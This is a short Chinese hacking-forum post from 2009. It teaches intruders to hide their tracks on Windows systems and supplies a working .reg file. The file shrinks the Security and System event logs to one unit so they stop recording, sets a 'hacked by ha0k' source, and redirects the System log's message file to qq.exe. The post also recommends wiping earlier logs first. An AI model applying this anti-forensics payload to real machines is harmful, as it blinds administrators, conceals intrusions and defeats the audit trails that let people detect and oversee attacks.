[经验分享] 修改日志文件属性保护自己不会被管理员发现

主题	好友	160 积分

注册会员

发消息

发表于 2009-10-31 10:25:12 |显示全部楼层

修改日志文件属性保护自己不会被管理员发现
日志文件的位置其实是存储在注册表中的,只要我们修改了其属性即可掩盖自己的入侵痕迹,
这里只修改默认位置,日志大小属性,比如日志大小为00000001,使其不能正常记录,
这样的话即可完美保证入侵不被记录,比清除日志更安全.当然首先配合清除日志工具,清除先前的痕迹,效果更好.
以下是demo代码:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Internet Explorer]
"MaxSize"=dword:00000001
"File"="%SystemRoot%\System32\Config\Internet Explorer.evt"
"Retention"=dword:00000000
"Sources"="hacked by ha0k"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Security]
"file"="%SystemRoot%\System32\config\SecEvent.Evt"
"MaxSize"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System]
"EventMessageFile"="%systemroot%\system32\qq.exe"
"File"="%SystemRoot%\system32\config\SysEvent.Evt"
"MaxSize"=dword:00000001